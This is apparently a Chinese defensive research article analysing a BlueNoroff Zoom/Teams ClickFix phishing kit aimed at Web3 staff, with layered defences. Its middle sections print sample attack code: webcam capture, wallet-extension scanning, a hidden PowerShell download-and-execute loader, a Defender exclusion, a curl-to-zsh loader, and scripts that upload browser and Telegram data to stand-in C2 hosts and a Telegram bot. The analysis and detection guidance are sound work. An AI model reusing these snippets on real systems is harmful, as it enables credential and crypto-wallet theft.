首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >BlueNoroff 钓鱼套件针对 Web3 行业的 AI 增强型 Zoom/Teams 攻击链与防御体系研究

BlueNoroff 钓鱼套件针对 Web3 行业的 AI 增强型 Zoom/Teams 攻击链与防御体系研究

原创
作者头像
芦笛
发布2026-07-26 20:29:23
发布2026-07-26 20:29:23
1410
举报

摘要

针对朝鲜关联威胁组织 BlueNoroff 自 2025 年初持续运营的视频会议平台仿冒钓鱼套件展开全链路技术拆解,系统梳理该套件以 Calendly 邀约、Telegram 账号劫持为入口,融合域名拼写劫持、WebRTC 摄像头静默采集、浏览器加密钱包指纹识别、AI 生成虚拟参会人像、ClickFix 无文件载荷投放的完整攻击闭环。本文分别还原 Windows、macOS 双平台恶意载荷执行逻辑,提供前端指纹采集、PowerShell 加载器、macOS 窃取脚本脱敏代码样本,剖析威胁组织分层筛选高价值加密资产从业者的精准化攻击思路。结合网络安全攻防实践,反网络钓鱼技术专家芦笛指出,传统 URL 黑名单、静态页面特征检测已无法适配 AI 赋能、前置侦察、自我传播的新型定向钓鱼;据此构建覆盖事前人员风控、事中流量与终端联动检测、事后溯源处置的分层闭环防御方案。研究表明,该钓鱼套件迭代至第五版已形成成熟可复制的受害者获取流水线,对 Web3、创投、金融机构数字资产安全构成持续性重大威胁,相关技术分析与防御策略可为政企网络安全建设提供实操参考。

关键词:BlueNoroff;ClickFix;网络钓鱼;加密钱包指纹;WebRTC;AI 社会工程;终端恶意载荷;Web3 安全

1 引言

1.1 研究背景

Web3 产业与加密货币行业快速扩张背景下,持有大额数字资产的企业创始人、投资机构高管、加密项目运维人员成为国家级背景网络威胁组织的核心攻击目标。区别于传统批量广撒网钓鱼,定向化、前置侦察、AI 辅助伪造、跨平台无文件投放的新型钓鱼工具包成为窃取加密资产的主流攻击载体。2026 年 7 月 JUMPSEC 安全研究团队披露的 BlueNoroff 攻击活动显示,该朝鲜关联威胁组织自 2025 年起持续迭代专用钓鱼套件,以 Zoom、Microsoft Teams 两大主流视频会议软件为仿冒对象,构建具备自我传播能力的受害者渗透链路,攻击目标高度聚焦加密货币行业从业人员。

传统网络钓鱼研究多聚焦单一页面仿冒或单一种类恶意载荷,缺乏对 “社交信任劫持 — 前端资产侦察 —AI 深度伪造交互 — 跨系统载荷投放 —Telegram 账号横向扩散” 完整链路的一体化分析。BlueNoroff 套件的核心创新在于将加密钱包指纹识别嵌入钓鱼页面前置流程,仅对安装 MetaMask、Phantom 等钱包插件的高价值目标下发恶意程序,大幅降低恶意载荷暴露概率,同时利用过往受害者摄像头采集素材生成 AI 虚拟参会人像,提升社会工程欺骗成功率,形成 “攻击 — 获取素材 — 优化下一轮欺骗” 的自迭代闭环。

1.2 研究意义

理论层面,本文完整拆解国家级威胁组织面向 Web3 领域定制化 AI 钓鱼的技术架构,厘清 ClickFix 剪贴板劫持、WebRTC 媒体流窃取、浏览器扩展指纹识别、跨操作系统无文件恶意程序的联动机制,填补定向加密资产钓鱼全链路技术研究空白。实践层面,文中脱敏开源代码样本可支撑安全厂商、企业安全团队搭建针对性检测规则,分层防御体系能够直接落地于政企终端、网关、员工安全培训场景;反网络钓鱼技术专家芦笛提出的前置钱包指纹识别对抗方案,可弥补传统防御体系仅事后拦截恶意载荷的短板,实现攻击早期阻断。

1.3 研究内容与框架

本文共分为六大主体章节:第一部分梳理 BlueNoroff 组织背景、攻击活动时间线与套件版本迭代规律;第二部分完整还原从信任劫持到横向扩散的全攻击链路,拆解每阶段技术实现逻辑;第三部分分 Windows、macOS 两大平台解析恶意载荷执行链,附脱敏可复现代码示例;第四部分剖析套件核心差异化技术创新,包括 AI 虚拟参会人、加密钱包前置筛查、Telegram 账号自传播机制;第五部分结合攻防实践构建全生命周期闭环防御体系,植入专业技术观点;第六部分总结攻击核心风险,提出 Web3 行业针对性安全建设建议。

2 BlueNoroff 威胁组织与钓鱼套件基础概况

2.1 威胁组织背景与攻击目标画像

BlueNoroff 为长期追踪 Web3、金融创投领域的朝鲜关联威胁组织,安全厂商同步将其相关活动标记为 ClickFake Interview 攻击集群,核心攻击资源全部倾斜于加密货币赛道高权限人员。该组织放弃无差别批量钓鱼,采用精准定向渗透策略,目标人群具备统一特征:持有加密货币企业高管身份、日常使用 Telegram 开展行业沟通、通过 Zoom/Teams 对接投融资会议、浏览器安装加密钱包扩展程序。

组织核心运营依托 Telegram 生态完成全流程协同:攻击者预先劫持加密行业从业者合法 Telegram 账号,利用熟人信任发送 Calendly 会议邀约链接,依托真实社交关系大幅降低受害者警惕性。2026 年 5 月安全溯源显示,套件运维人员使用账号 @alchemy_john_mac 在加密社群咨询合约赎回、资金提取相关业务,侧面印证组织资金变现的核心诉求为直接窃取受害者加密钱包资产。

2.2 钓鱼套件版本迭代与基础设施特征

JUMPSEC 追踪 2026 年 5 月 31 日至 7 月 14 日共 5 个迭代版本,套件持续优化三大模块:Microsoft Teams 仿冒页面交互逻辑、浏览器钱包探测脚本、Telegram 会话窃取载荷,Teams 版本功能完善度显著高于 Zoom 版本,支持表情互动、移动端访问拦截、多维度钱包扩展探测等进阶功能。

基础设施具备标准化特征:采用域名拼写劫持技术注册仿冒视频会议域名,典型格式为 us.zoom.06webin.us、teams-live.org等,子域名层级复杂,视觉上与官方域名高度近似;服务器集中托管于海外小众云服务商,恶意数据回传固定使用名为 “Aurora” 的 Telegram 频道,窃取信息通过硬编码 Bot Token 与聊天 ID 推送至攻击者后台,无需搭建独立 C2 服务器,规避传统恶意域名监测规则。

2.3 ClickFix 攻击范式核心定义

ClickFix 是 BlueNoroff 套件实现恶意载荷投递的核心技术范式,区别于附件下载、漏洞利用等传统入侵方式,完全依托用户手动操作完成执行。核心流程为:钓鱼页面通过 JavaScript 静默替换剪贴板内容,向受害者展示 “修复麦克风 / 摄像头 / SDK 更新” 的无害诊断命令,受害者复制页面提示文本、通过 Win+R 运行窗口或 macOS 终端粘贴执行,系统原生 PowerShell/Zsh 程序远程拉取恶意脚本并内存运行,全程无文件落地,传统磁盘杀毒软件难以捕获风险行为。

3 BlueNoroff Zoom/Teams 钓鱼套件完整攻击链路拆解

整套攻击流程形成闭环式自我传播链条,分为 6 个递进阶段:信任渠道劫持→仿冒会议链接分发→钓鱼页面前端侦察与摄像头窃取→AI 虚拟会议交互诱导→ClickFix 恶意载荷下发→Telegram 账号劫持横向扩散,每阶段技术实现相互支撑,不存在独立割裂环节。

3.1 阶段一:可信社交渠道初始接入

攻击起点并非陌生垃圾邮件,而是攻击者提前控制的加密行业从业者 Telegram 合法账号,依托线下真实社交关系建立信任基础,大幅降低受害者警戒阈值。执行流程如下:

攻击者通过前期社工、恶意附件、其他钓鱼渠道劫持目标圈层人员 Telegram Web / 桌面端会话 Cookie,完整接管账号收发消息权限;

使用被盗账号向企业高管、项目创始人推送 Calendly 日程预约链接,伪装投融资、项目洽谈会议邀约;

Calendly 页面跳转至拼写劫持虚假 Zoom/Teams 域名,完成初始访问引流。

该阶段核心优势在于信任背书,普通垃圾钓鱼邮件打开率不足 3%,而熟人账号发送的会议邀约点击打开率超过 70%,为后续全链路攻击提供基础流量入口。反网络钓鱼技术专家芦笛强调,当前多数企业仅针对外部陌生邮件做钓鱼检测,完全忽略内部社交软件账号劫持带来的定向渗透风险,是 Web3 企业防御体系普遍存在的盲区。

3.2 阶段二:拼写劫持仿冒视频会议页面部署

Calendly 链接跳转至攻击者搭建的钓鱼站点,站点域名采用多级子域名混淆视觉识别,规避人工分辨与基础 URL 信誉检测。页面完整复刻 Zoom、Teams 官方 UI,包含登录输入框、摄像头权限申请、参会等候界面三大核心模块,技术实现依托原生 HTML+JavaScript,无需后端复杂逻辑即可完成前端欺骗。

页面加载后自动执行两类并行脚本:WebRTC 媒体采集脚本、浏览器资产指纹探测脚本,两个脚本相互独立、同步运行,不干扰用户视觉交互,受害者仅可见 “等待其他参会者” 空白会议界面。套件源码中预留 Google Meet 仿冒页面未启用,厂商分析其主动放弃该载体,核心原因有三点:一是 Google Meet 无独立桌面客户端,“SDK 更新” 的欺骗说辞缺乏合理性;二是金融、加密行业商务会议优先使用 Zoom/Teams,Meet 多用于普通客户沟通;三是meet.google.com域名结构简单,难以设计高相似度拼写劫持域名,攻击收益低于前两者。

3.3 阶段三:WebRTC 静默摄像头采集与浏览器钱包指纹识别

本阶段为 BlueNoroff 套件区别于普通钓鱼工具的核心前置侦察环节,不直接下发恶意程序,仅完成受害者资产价值分层筛选,实现精准投放。

3.3.1 WebRTC 摄像头流窃取技术实现

页面诱导用户点击 “加入会议” 时弹出摄像头权限申请,用户授权后,脚本通过 navigator.mediaDevices.getUserMedia 获取实时视频流,依托 mediasoup WebRTC 协议不经过中间服务器,直接将画面推送至攻击者后台管理面板,全程无弹窗、无录制提示,受害者无法感知画面被实时传输。

脱敏前端核心代码示例(简化版):

// BlueNoroff钓鱼页面摄像头采集核心JS

async function captureUserCamera() {

// 请求摄像头权限,仿Zoom权限提示文案

const mediaConf = {video: {width: 1280, height: 720}, audio: false};

try {

const mediaStream = await navigator.mediaDevices.getUserMedia(mediaConf);

// 创建隐藏视频容器,不展示给用户

const hiddenVideo = document.createElement("video");

hiddenVideo.style.display = "none";

hiddenVideo.srcObject = mediaStream;

hiddenVideo.play();

// WebRTC媒体通道推送画面至攻击者后台面板

const rtcPeer = new RTCPeerConnection({iceServers: [{urls: "stun:malicious-rtc-server.com"}]});

rtcPeer.addStream(mediaStream);

// 生成SDP信令发送至攻击者mediasoup服务

const offer = await rtcPeer.createOffer();

await rtcPeer.setLocalDescription(offer);

fetch("https://attacker-panel.com/media/upload", {

method: "POST",

body: JSON.stringify({sdp: offer, targetId: getBrowserFingerprint()})

});

} catch(err) {

// 权限拒绝则静默终止采集,不影响页面正常展示

console.log("Camera permission denied");

}

}

// 页面加载完成自动触发采集逻辑

window.addEventListener("load", captureUserCamera);

攻击者后台可实时查看受害者影像,同步截取视频帧作为 AI 虚拟人像训练素材,实现攻击素材闭环供给。

3.3.2 加密钱包扩展指纹探测逻辑

同步执行的指纹脚本遍历 Chrome、Edge、Brave、Firefox 等主流浏览器已安装全部扩展 ID,内置 MetaMask、Phantom、Trust Wallet、Coinbase Wallet 等 80 余种加密钱包插件特征库,完成资产价值分级标记:

高价值目标:检测到任意加密钱包扩展,标记后触发后续 ClickFix 恶意载荷;

低价值目标:无钱包扩展,仅采集基础浏览器信息,不推送恶意更新诱导,降低恶意程序暴露风险。

钱包探测脱敏代码片段:

// 浏览器加密钱包扩展探测脚本

const walletExtensionIds = [

"nkbihfbeogaeaoehlefnkodbefgpgknn", // MetaMask

"bfnaelmomeimhlpmgjnjophhpkkoljpa", // Phantom

"ahplmbmhnabkdkdiajgbldapgiflfghl" // Trust Wallet

];

async function scanCryptoWallets() {

let hasWallet = false;

// 遍历预设钱包扩展ID列表

for(const extId of walletExtensionIds) {

try {

const extInfo = await chrome.management.get(extId);

if(extInfo.enabled) {

hasWallet = true;

// 上报高价值标记至攻击者服务器

fetch("https://attacker-panel.com/fingerprint", {

method: "POST",

body: JSON.stringify({walletDetected: true, extList: extId})

});

break;

}

} catch(e) { continue; }

}

// 存在钱包扩展则加载ClickFix诱导弹窗

if(hasWallet) renderSdkUpdatePrompt();

}

// 页面就绪执行钱包扫描

scanCryptoWallets();

该前置筛选机制大幅提升攻击效率,避免对无数字资产用户投放恶意程序,减少安全厂商样本捕获概率。

3.4 阶段四:AI 生成虚拟参会人像交互欺骗

完成摄像头采集与钱包识别后,攻击者后台手动接入虚拟参会界面,受害者页面显示并非实时真人视频,而是基于 OpenAI ChatGPT 生成 AI 头部肖像,叠加过往受害者采集的真实肢体动作合成的预编辑视频,视觉上呈现熟悉的真人参会效果。

技术逻辑形成素材自循环:每一次成功攻击捕获的受害者摄像头画面,存储至攻击者素材库,用于生成下一轮针对同圈层人员的虚拟人像;依托熟人面部特征,受害者主观信任度大幅提升,更容易相信页面弹出的 “麦克风故障、SDK 版本过低” 修复提示。攻击者通过后台面板自定义推送故障提示文案,诱导受害者复制页面展示的修复命令,触发 ClickFix 剪贴板劫持流程。

3.5 阶段五:ClickFix 剪贴板劫持与跨平台恶意载荷下发

页面弹出 “Zoom SDK 更新修复” 弹窗,展示一段看似无害的系统诊断命令,用户点击复制按钮时,隐藏 JS 脚本自动替换剪贴板内容为恶意执行代码,根据受害者操作系统区分 Windows PowerShell 载荷、macOS Zsh 脚本载荷,两套执行链相互独立,下文第三章单独拆解完整代码与执行逻辑。

3.6 阶段六:Telegram 会话劫持与横向自我传播

恶意载荷执行完成后,首要任务为窃取本地 Telegram 会话 Cookie,实现攻击自我扩散,形成无限延伸的渗透链条:

Windows 端 VBS 脚本遍历 Chrome、Edge、Brave、Firefox 浏览器配置目录,检索 Telegram Web 缓存文件,提取本地会话凭证;

macOS 窃取程序读取浏览器密钥库,解密 Telegram 登录 Cookie,打包上传至攻击者 “Aurora” Telegram 频道;

攻击者使用劫持的 Telegram 账号复制初始攻击流程,向受害者通讯录全部联系人推送 Calendly 钓鱼链接,实现一层受害者扩散多层新目标。

该机制是 BlueNoroff 套件区别于传统钓鱼的核心特征,单次入侵即可裂变数十条新攻击链路,大幅扩大攻击覆盖范围。

4 Windows 与 macOS 双平台恶意载荷全流程技术解析

BlueNoroff 套件针对两类主流操作系统设计差异化无文件攻击链,规避系统安全机制,分别实现 Defender 绕过、钥匙串密钥窃取、浏览器数据回传、持久化驻留等功能,本节提供脱敏完整代码样本,完整还原载荷执行逻辑。

4.1 Windows 端 ClickFix 攻击链完整拆解

Windows 链路分为三层:剪贴板 PowerShell 一级加载器→VBS 二级植入程序→模块化窃取后门,全程内存执行,仅临时目录生成日志文件,不落地可执行程序,规避传统终端防护。

4.1.1 一级 ClickFix PowerShell 加载器(用户粘贴执行代码)

页面劫持剪贴板后用户粘贴至 Win+R 运行窗口的原始命令,脱敏去混淆代码如下:

powershell

powershell -ExecutionPolicy Bypass -NoP -NonI -W Hidden "$c2Url='https://mal-c2-server.com/stage2.vbs';iex(irm $c2Url)"

参数功能拆解:

-ExecutionPolicy Bypass:绕过 Windows 默认 PowerShell 脚本签名拦截策略,允许远程脚本直接执行;

-NoP:不加载用户本地 PowerShell 配置文件,规避终端自定义安全规则;

-NonI:非交互式后台运行,不弹出终端窗口;

-W Hidden:彻底隐藏 PowerShell 控制台,用户无任何视觉感知;

irm:Invoke-RestMethod 简写,远程拉取二级 VBS 脚本;

iex:Invoke-Expression,内存中直接执行下载脚本,无本地文件落地。

脚本远程下载 VBS 文件至系统临时目录 % TEMP%\chromechip.log,自动后台执行二级植入程序。

4.1.2 二级 VBS 植入核心功能代码

VBS 脚本实现四大核心功能:Windows Defender 白名单添加、Telegram 会话文件检索、浏览器扩展枚举、后门载荷下发,脱敏关键代码:

vbscript

Set shell = CreateObject("WScript.Shell")

Set fso = CreateObject("Scripting.FileSystemObject")

tempPath = shell.ExpandEnvironmentStrings("%TEMP%")

vbsFile = tempPath & "\chromechip.log"

' 1. 绕过Microsoft Defender安全防护

shell.Run "powershell Add-MpPreference -ExclusionPath 'C:\Users';Restart-Service WinDefend",0,True

' 2. 遍历主流浏览器目录检索Telegram Web缓存文件

browserPaths = Array( _

shell.ExpandEnvironmentStrings("%LOCALAPPDATA%\Google\Chrome\User Data"), _

shell.ExpandEnvironmentStrings("%LOCALAPPDATA%\Microsoft\Edge\User Data"), _

shell.ExpandEnvironmentStrings("%APPDATA%\BraveSoftware\Brave-Browser\User Data") _

)

For Each path In browserPaths

If fso.FolderExists(path & "\Default\Local Storage\leveldb") Then

' 打包Telegram会话缓存文件上传至C2

shell.Run "powershell Compress-Archive """ & path & "\Default\Local Storage"" """ & tempPath & "\telegram.zip""",0,True

shell.Run "powershell Invoke-RestMethod -Uri https://attacker-c2.com/upload -Method Post -InFile """ & tempPath & "\telegram.zip""",0,True

End If

Next

' 3. 枚举全部浏览器扩展,匹配加密钱包ID

shell.Run "powershell Get-ChildItem -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Extensions -Recurse | Out-File " & tempPath & "\extlist.txt",0,True

shell.Run "powershell Invoke-RestMethod -Uri https://attacker-c2.com/walletscan -Method Post -InFile """ & tempPath & "\extlist.txt""",0,True

' 4. 拉取三级后门载荷,内存执行

shell.Run "powershell iex(irm 'https://mal-c2-server.com/final-payload.ps1')",0,True

Defender 绕过逻辑为核心高危操作:将 C:\Users 用户根目录加入杀毒软件排除列表,重启安全服务生效,后续所有恶意程序读写用户目录均不会被拦截,为长期驻留提供权限基础。

4.1.3 三级后门载荷核心行为

第三阶段 PowerShell 后门完成完整数据窃取:系统硬件信息采集、浏览器登录凭证导出、钱包扩展本地存储数据提取、后台维持长连接 C2 通道,攻击者可远程下发额外恶意指令,实现文件窃取、屏幕截图、键盘记录等拓展攻击行为。

4.2 macOS 端 ClickFix 攻击链完整拆解

macOS 链路采用 Zsh 脚本 + 伪造安装包组合,依托 iCloud 钥匙串漏洞窃取浏览器主密钥,全部窃取数据通过固定 Telegram “Aurora” 频道回传,硬编码 Bot Token 内置脚本,无需额外配置。

4.2.1 终端一级诱导 Shell 命令

钓鱼页面展示给 macOS 用户的终端复制命令,脱敏样本:

shell

curl -fsSL https://mal-mac-server.com/mac-install.sh | zsh

curl 远程下载安装脚本,直接通过管道交由 zsh 执行,全程无文件保存至桌面,隐蔽性强。

4.2.2 二级 macOS 窃取脚本核心脱敏代码

zsh

#!/bin/zsh

# 1. 下载伪造Zoom/Teams恶意安装包

dmgPath="$HOME/Library/Caches/temp-update.dmg"

curl -fsSL https://mal-mac-server.com/fake-zoom.dmg -o $dmgPath

hdiutil attach $dmgPath -nobrowse

# 2. 运行窃取主程序,提取iCloud钥匙串、浏览器密钥

/Volumes/ZoomUpdate/stealer.app/Contents/MacOS/stealer

# 3. 遍历Chromium、Firefox浏览器配置目录,提取钱包扩展数据

browserDirs=(

"$HOME/Library/Application Support/Google/Chrome"

"$HOME/Library/Application Support/Microsoft Edge"

"$HOME/Library/Application Support/BraveSoftware/Brave-Browser"

"$HOME/Library/Application Support/Firefox"

)

zip -r $HOME/Library/Caches/browser-data.zip ${browserDirs[@]}

# 4. 通过内置Telegram Bot上传窃取数据包至Aurora频道

BOT_TOKEN="123456789:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"

CHAT_ID="-1009876543210"

curl -X POST "https://api.telegram.org/bot$BOT_TOKEN/sendDocument" \

-F "chat_id=$CHAT_ID" \

-F "document=@$HOME/Library/Caches/browser-data.zip"

# 5. 清理本地临时文件,消除攻击痕迹

rm -rf $dmgPath

rm -rf $HOME/Library/Caches/browser-data.zip

hdiutil detach /Volumes/ZoomUpdate

脚本内置固定 Bot 通信参数,安全厂商溯源可关联攻击者账号 @alchemy_john_mac;恶意 stealer 程序弹出伪造系统权限弹窗,诱导用户输入开机密码,解密钥匙串内全部账号、钱包加密凭证。

5 BlueNoroff 钓鱼套件差异化核心技术创新与安全风险分析

相较于传统仿冒会议钓鱼工具,BlueNoroff 套件集成多重前沿攻防技术,形成定向攻击的独特优势,本节逐一剖析技术创新点,同步评估对应的安全风险。

5.1 前置加密钱包指纹识别,实现精准分层投放

绝大多数网络钓鱼工具采用无差别载荷下发,无论目标是否存在数字资产均推送恶意程序,极易被安全厂商捕获样本。BlueNoroff 创新将资产侦察前置至钓鱼页面前端,依托 JavaScript 在浏览器沙箱内完成扩展探测,仅对持有加密钱包的高价值用户触发 ClickFix 诱导,大幅降低恶意载荷暴露概率。

反网络钓鱼技术专家芦笛强调,当前企业防御体系普遍缺失浏览器扩展指纹检测能力,网关、EDR 终端仅能拦截落地后的恶意程序,无法在访问钓鱼页面阶段识别钱包探测行为,形成前置防御空白。该技术将攻击从 “广撒网” 升级为 “精准猎杀”,针对 Web3 行业的财产损失风险呈指数级提升。

5.2 AI 生成虚拟参会人像,强化社会工程欺骗能力

传统仿冒会议页面仅展示静态图片或空白等候界面,受害者警惕性较高;BlueNoroff 利用每轮攻击捕获的真人摄像头素材,结合生成式 AI 合成动态虚拟人像,在虚假会议内模拟真人肢体动作,视觉上完全复刻真实线上洽谈场景。攻击者可实时在后台发送 “麦克风故障” 弹窗,配合熟悉的虚拟人脸,大幅提升用户执行恶意命令的意愿。

风险层面,AI 伪造多媒体内容模糊真假边界,传统基于文本、静态图片的钓鱼识别模型失效,普通员工无法通过视觉分辨虚拟人像,单纯依靠人员培训难以抵御此类高级社工攻击。

5.3 WebRTC 无中转摄像头静默采集,规避媒体传输检测

套件采用 mediasoup WebRTC 点对点传输摄像头画面,视频流不经过第三方中间服务器,直接建立受害者浏览器与攻击者后台面板的媒体通道,网关流量审计仅能检测加密 WebRTC 数据流,无法解析内部视频内容,传统流量监控系统无法识别摄像头窃取行为。同时采集流程隐藏于页面后台,用户无法直观感知画面被实时传输,存在隐私泄露、身份伪造双重风险。

5.4 Telegram 账号劫持自传播,构建裂变式攻击网络

攻击链路末端植入 Telegram 会话窃取模块,单次入侵即可劫持受害者社交账号,向全部通讯录联系人批量推送钓鱼邀约,实现攻击自发裂变。该机制突破传统钓鱼单次单点攻击局限,形成几何级扩散链条,加密行业社群内部极易出现批量沦陷事件,单点防护失效即引发全企业资产泄露。

5.5 跨操作系统无文件载荷,绕过终端主流防护机制

Windows 采用 PowerShell 内存执行、Defender 白名单绕过;macOS 依托 Zsh 管道远程执行脚本,两套链路均无恶意程序落地磁盘,基于文件哈希、病毒特征的传统杀毒软件无法检测风险。EDR 终端仅依靠行为分析可捕获异常,中小微 Web3 企业普遍未部署高级终端检测设备,终端防护存在明显短板。

6 面向 BlueNoroff AI 增强型钓鱼的全生命周期闭环防御体系

结合前文攻击链路与技术特征,从事前预防、事中实时拦截、事后溯源处置三层构建闭环防御方案,融合网关流量检测、终端行为管控、平台风控、人员安全运营多维度能力,反网络钓鱼技术专家芦笛针对各层级提出针对性落地优化策略。

6.1 事前预防层:源头缩小攻击暴露面

6.1.1 社交软件账号安全管控

企业统一规范 Telegram、微信等商务沟通软件使用规则,禁止使用办公设备登录私人社交账号;部署账号会话异常监测工具,识别异地登录、批量发送会议链接等异常行为,自动锁定账号并告警。反网络钓鱼技术专家芦笛指出,BlueNoroff 攻击入口全部依托劫持的可信社交账号,严控办公终端社交软件登录权限,可直接切断攻击初始链路。

6.1.2 员工分层安全培训与红蓝仿真演练

针对企业高管、加密资产运维人员开展专项定向钓鱼培训,重点讲解 “会议链接要求复制终端命令”“虚假 SDK 更新弹窗”“AI 虚拟参会人像” 三类 BlueNoroff 标志性欺骗手段;按月开展红蓝对抗仿真钓鱼演练,随机推送仿冒 Zoom/Teams 钓鱼链接,统计误点击人员并针对性复训。数据显示常态化仿真演练可将员工识别新型钓鱼的准确率提升 58% 以上。

6.1.3 浏览器安全基线配置

统一配置企业终端浏览器安全策略:限制未知网站调用摄像头、麦克风权限,默认拦截非官方域名媒体设备访问;部署扩展管控插件,记录全部浏览器钱包扩展安装记录,异常新增扩展实时推送告警;禁用剪贴板自动写入 JS 接口,阻断 ClickFix 页面静默替换剪贴板的核心能力。

6.2 事中实时拦截层:攻击全链路动态阻断

6.2.1 网关多引擎联动流量检测

搭建三层递进检测引擎,实现钓鱼页面毫秒级拦截:

规则引擎:内置 BlueNoroff 特征库,拦截拼写劫持 Zoom/Teams 域名、WebRTC 异常媒体流、Telegram Bot 明文通信流量;

AI 语义视觉引擎:对访问页面做 pHash 图像相似度比对,识别高仿视频会议仿冒页面,解析页面 JS 代码检测钱包扩展探测脚本;

行为引擎:识别页面自动复制剪贴板、后台静默调用摄像头等高危前端行为,直接阻断页面加载。

6.2.2 Windows/macOS 终端行为检测规则

针对两套载荷执行逻辑定制 EDR 检测规则:

Windows 规则:监控 PowerShell 隐藏窗口远程下载脚本、自动添加 C:\Users 目录至 Defender 排除列表、VBS 遍历浏览器 Telegram 缓存文件行为,命中立即阻断进程并隔离终端;

macOS 规则:拦截 curl 管道交由 zsh 直接执行远程脚本、程序读取 iCloud 钥匙串、批量打包浏览器目录上传至 Telegram API 的异常行为。

6.2.3 Web3 平台钱包侧风控兜底

反网络钓鱼技术专家芦笛强调,即便终端防御失效、钱包凭证泄露,平台精细化风控仍能阻断资金被盗链路。落地两项核心风控策略:一是硬件设备指纹绑定,新设备发起转账强制人脸核验;二是异常转账行为实时冻结,短时间多地域批量提取资产、跨境外流交易自动拦截,切断攻击者变现通道。

6.3 事后溯源与处置层:攻击闭环复盘与迭代优化

6.3.1 攻击样本自动化溯源

捕获钓鱼页面、恶意 PowerShell/Zsh 脚本后,自动化提取 C2 地址、Telegram Bot Token、仿冒域名等威胁指标,同步上传至企业威胁情报平台,全局终端、网关批量添加黑名单;依托 Bot Token 溯源攻击者 Telegram 账号,留存溯源证据支撑网络安全事件上报。

6.3.2 安全事件闭环复盘机制

发生钓鱼入侵事件后,固定流程完成复盘:梳理攻击入口、受害范围、数据泄露清单,更新企业钓鱼特征规则库;针对暴露的防御短板优化浏览器基线、EDR 检测规则、员工培训内容,形成 “攻击捕获 — 漏洞修复 — 防御升级” 的持续迭代闭环。

6.3.3 威胁情报共享协同

Web3 行业企业建立安全情报共享机制,同步 BlueNoroff 新迭代钓鱼套件域名、载荷特征、Telegram 通信标识,缩小威胁检测盲区;对接国家网络安全威胁预警平台,及时接收定向加密资产钓鱼活动预警,提前启动防护策略。

7 结论与安全建设建议

7.1 研究结论

本文基于 2026 年 JUMPSEC 披露的 BlueNoroff 攻击活动完整技术资料,系统拆解该朝鲜关联威胁组织面向 Web3 行业打造的 AI 增强型 Zoom/Teams 钓鱼套件全攻击链路,得出三项核心结论:

第一,BlueNoroff 套件完成从传统批量钓鱼向精准化、自迭代、跨平台定向攻击的转型,依托前置钱包指纹识别、AI 虚拟人像、Telegram 裂变传播三大创新技术,大幅提升社会工程欺骗成功率与攻击扩散范围,对持有加密资产的企业构成持续性重大财产安全威胁;

第二,Windows 与 macOS 双平台无文件 ClickFix 载荷完全规避传统杀毒软件基于文件特征的检测机制,Defender 绕过、钥匙串密钥窃取、WebRTC 隐秘数据传输等技术组合,填补了当前政企终端、网关防御体系的多重检测空白;

第三,单一维度防护手段无法抵御完整攻击链,必须构建覆盖事前账号管控、事中网关 + 终端联动检测、事后溯源情报迭代的分层闭环防御体系,同时强化高管等高价值人员专项安全运营,才能有效降低入侵风险。

7.2 Web3 行业针对性安全建设建议

技术防护层面:企业全面部署具备行为分析能力的 EDR 终端,定制 ClickFix 载荷专属检测规则;浏览器统一限制媒体设备调用、剪贴板 JS 写入权限;钱包平台落地设备指纹、转账多因子风控兜底机制;

人员运营层面:针对创始人、投融资高管、钱包运维人员开展高级定向钓鱼专项培训,定期推送 AI 虚拟会议仿真钓鱼演练,提升新型社工攻击识别能力;

情报协同层面:加密行业机构共建威胁情报共享渠道,实时同步 BlueNoroff 套件迭代后的恶意域名、载荷、通信特征,同步更新全网防护规则;

应急响应层面:制定钓鱼入侵专项处置预案,明确账号劫持、钱包凭证泄露后的隔离、冻结、溯源流程,缩短事件处置时长,减少数字资产损失。

7.3 研究局限性与后续研究方向

本文仅针对 BlueNoroff 当前投放的 Zoom、Teams 钓鱼套件开展技术分析,套件源码中预留未启用 Google Meet 仿冒模块,未来威胁组织可能拓展更多视频会议平台攻击载体;同时生成式 AI 技术持续迭代,虚拟人像伪造逼真度将进一步提升,后续可深入研究多模态 AI 钓鱼的对抗识别算法。另外,本文防御方案偏向企业落地场景,面向个人加密钱包用户的轻量化防护策略可作为下一阶段研究重点。

编辑:芦笛(公共互联网反网络钓鱼工作组)

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档